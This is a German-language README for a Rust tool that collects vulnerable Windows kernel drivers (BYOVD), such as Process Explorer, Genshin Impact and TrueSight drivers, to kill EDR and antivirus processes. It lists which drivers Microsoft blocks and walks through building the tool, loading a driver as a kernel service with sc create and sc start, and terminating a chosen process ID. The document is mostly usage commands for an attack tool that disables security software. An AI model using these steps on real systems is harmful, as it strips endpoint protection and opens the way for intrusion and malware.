
BYOVD collection
Dieses Projekt ist eine BYOVD-Sammlung mit dem Fokus auf das Beenden von EDR-/AV-Prozessen.
Derzeit werden die folgenden Treiber unterstützt:
| Treiber | Argumentname | Blockiert |
|---|---|---|
| Process Explorer | process_explorer | Ja |
| Genshin Impact | genshin | Ja |
| Rentdrv2 | rentdrv2 | Nein |
| TrueSight | truesight | Nein |
Blockiert bedeutet, dass der Treiber in der Blockliste von Microsoft enthalten ist und auf einem aktuellen Windows nicht ausgeführt werden kann.
cargo build --release
rusty_drivers.exe --help
Usage: rusty_drivers.exe --pid <PID> --driver <DRIVER>
Options:
-p, --pid <PID>
-d, --driver <DRIVER>
-h, --help Print help
-V, --version Print version
Da die ausführbare Datei keinen Dienst registriert, um den Treiber auszunutzen, muss dies manuell erfolgen:
sc create Test123 binpath= c:\test\<DRIVER>.sys type= kernel start= auto
Anschließend kann der Dienst gestartet werden:
sc start Test123
Schließlich kann der folgende Befehl verwendet werden, um den Prozess mit der PID 1234 mithilfe des Process-Explorer-Treibers zu beenden:
rusty_drivers.exe --pid 1234 --driver process_explorer
Nicht vergessen, den Dienst anschließend zu entfernen:
sc stop Test123
sc delete Test123